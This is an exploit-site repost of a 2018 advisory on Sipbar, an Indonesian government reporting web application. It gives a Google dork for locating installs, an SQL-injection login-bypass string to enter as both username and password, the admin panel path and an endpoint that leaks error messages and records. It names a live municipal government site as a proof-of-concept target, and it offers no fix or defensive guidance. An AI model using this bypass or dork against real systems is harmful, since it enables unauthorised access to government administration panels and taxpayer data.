Advertisement






Sipbar Sistem Informasi Pelaporan Indonesia Admin Login Bypass and SQL Injection Vulnerability

CVE Category Price Severity
N/A CWE-592 Unknown Critical
Author Risk Exploitation Type Date
Unknown High Remote 2018-06-21
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018060217

Below is a copy:

Sipbar Sistem Informasi Pelaporan Indonesia Admin Login Bypass and SQL Injection Vulnerability
#################################################################################################

# Exploit Title : Sipbar Sistem Informasi Pelaporan Indonesia Admin Login Bypass and SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 21/06/2018
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592  [ Authentication Bypass Issues ]
+ CWE-89  [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Google Dorks : inurl:''/assets/media/logo_kanal/''

# Exploit : Use both for username and password as =>  '=''or'

# Admin Control Panel Path : /login

# Site Logo Change Path => /assets/media/logo_kanal/.....

#################################################################################################

# SQL Injection Error => 

# /penyebaran/tracking_sppt/getNop/

A PHP Error was encountered
Severity: Warning

Message: Missing argument 1 for Tracking_sppt::getNop()

Filename: controllers/tracking_sppt.php

Line Number: 19

{"id_sppt":"1077420","thn_pajak":"0","nop":"","nop2":"","kd_kecamatan":null,"kd_kelurahan":null,"nama_wp":null,"kecamatan":null,
"kelurahan":null,"alamat_op":null,"alamat_wp":null,"pbb":null}

#################################################################################################

# Example Sites : sipbar.tangerangkota.go.id => [ Proof of Concept ] => archive.is/aHKRV - archive.is/1K0DF

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.